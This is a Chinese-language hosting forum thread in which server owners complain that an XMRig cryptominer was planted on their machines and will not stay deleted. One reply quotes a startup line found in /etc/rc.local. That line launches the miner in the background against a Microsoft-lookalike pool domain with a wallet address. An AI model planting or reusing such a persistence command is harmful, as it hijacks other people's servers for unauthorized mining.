全球主机交流论坛

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码

哪个大仙,在我机器上安装了个Xmrig

是我删除不掉啊
弄的我好惆怅
帮你打工不好吗
我一个朋友有台机器也被安装了。然后/etc/rc.locl留下了

1. ping -c 3 8.8.8.8 >> /tmp/pingit
  2. nohup /etc/xmrig -o xmr.micrr0soft.com:7777 -u 48CQu7Tb8zRag3iZZjXRfMjnj7s2ZvopXMqrZRZviTasVF3vwfh6xHr9zeQ143wLpBiRsbXDYMMozY8J5ogaghViHmjc1jX -p x -t 18 > /dev/null 2>&1 &
复制代码
txjcv 发表于 2019-11-9 21:49
我一个朋友有台机器也被安装了。然后/etc/rc.locl留下了

我没有这个文件

直接在 /TMP/xmrig-2.99.0-beta

一个这个目录

删除了还有。
heibudong 发表于 2019-11-9 22:02
我没有这个文件

我朋友那个是在/etc/xmrig 文件
heibudong 发表于 2019-11-9 22:02
我没有这个文件

我朋友那个是在/etc/xmrig 文件